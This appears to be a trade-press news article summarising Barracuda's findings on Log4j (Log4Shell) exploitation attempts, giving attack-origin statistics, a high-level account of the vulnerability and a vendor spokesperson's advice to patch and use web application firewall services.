Given the popularity of Log4J software – a Java-based logging audit framework within Apache, researchers at Barracuda, a trusted partner and leading provider of cloud-focused security solutions, have identified attacks targeting its vulnerabilities which have remained stable since December 10, 2021. Researchers found that 83% of attacks were carried out from IP addresses in the United States, with half of these IP addresses associated with AWS, Azure and other data centers. Meanwhile, 10% of attacks were carried out from IP addresses in Japan, 3% in Germany, 3% in the Netherlands and 1% in Russia.
While the IP addresses only performed the scans and intrusion attempts, the actual payloads were delivered by other compromised websites or VPS hosts after the attack passed. These IP addresses carrying the payloads are typically obfuscated using Base64 encoding.
Log4j is a Java-based logging auditing framework which is an Apache project and used in almost all internet and intranet services. Its new vulnerability allows hackers to carry out remote code execution (RCE) attacks on a target system. These attacks are very easy to perform for anyone aware of how they work.
Attackers controlling log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message search substitution is enabled. The vulnerability affects the default configurations of several Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, which are used by numerous organizations like Apple, Amazon, Cloudflare, Twitter, Steam, and others. It is triggered by sending a specific string to Log4j software, which makes it easy to exploit, and the wide use of this software means there are multiple attack vectors.
Sharing his thoughts on such attacks, Tushar Richabadas, Senior Product Marketing Manager, Applications and Cloud Security, Barracuda said, “The Log4j vulnerability has taken the cyber world by storm. The best way to protect against log4shell specifically is to upgrade to the latest version of log4j software so that vulnerabilities are patched in a timely manner. Due to the increasing number of vulnerabilities found in web applications, it is becoming increasingly complex to protect against attacks. However, all-in-one solutions are now available to protect web applications from being exploited due to these vulnerabilities. WAF/WAF-as-a-Service solutions, also known as Web Application and API Protection (WAAP) services, can help protect web applications by providing all the latest security solutions in one easy-to-use product. .
If you have an interesting article / experience / case study to share, please contact us at [email protected]